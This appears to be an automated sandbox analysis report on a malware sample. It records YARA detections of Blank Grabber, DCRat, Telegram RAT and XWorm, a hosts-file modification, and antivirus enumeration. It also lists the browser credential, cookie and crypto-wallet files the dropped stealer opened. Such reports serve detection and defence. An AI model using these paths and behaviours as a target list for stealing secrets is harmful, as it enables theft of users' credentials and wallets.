Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 1_2_00007FF76D5CC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00007FF76D5CC330

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 1_2_00007FF76D5E4F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

1_2_00007FF76D5E4F10

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

Code function: 2_2_0029ACF5 GetVersionExW,

2_2_0029ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C250000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1694117012.0000021AFD7E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2039099236.000001D5E543D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2029505952.000001D5E6183000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2038832287.000001D5E5438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2032955728.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Built.exe PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match	File source: 00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2143786130.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2143786130.0000000003202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2143786130.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1871672428.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.2132843674.0000000002412000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2149228048.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2144420087.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2149228048.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2145328378.0000000002848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.2132843674.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1871672428.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: comReviewsession.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 8064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7776, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: Vjy8d2EoqK.exe, type: SAMPLE
Source: Yara match	File source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vjy8d2EoqK.exe PID: 2596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: S l r .exe PID: 5768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Built.exe, 00000003.00000003.1847774640.000001D5E5413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: Built.exe, 00000003.00000002.2054526869.000001D5E5820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: oaming\Exodus\exodus.wal0
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreaty0
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreaty0
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state	Jump to behavior
